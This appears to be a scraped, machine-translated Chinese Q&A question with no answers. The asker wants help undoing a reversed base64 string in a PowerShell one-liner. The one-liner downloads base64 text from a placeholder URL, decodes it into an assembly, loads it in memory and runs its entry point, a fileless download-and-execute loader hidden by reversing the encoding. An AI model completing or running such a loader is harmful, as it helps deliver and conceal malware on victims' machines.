如何在入口点的DownloadString之后反转base64

时间:2019-01-16 08:47:05

标签: powershell

使用DownloadString()下载base64后,如​​何将base64还原回原始字符?

我已经反转了base64,但是现在在我的代码中,我需要将其反转回原始字符。

这是我的代码:

[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((New-Object System.Net.WebClient).DownloadString(' here the Base64'))).EntryPoint.Invoke($null, $null)

0 个答案:

没有答案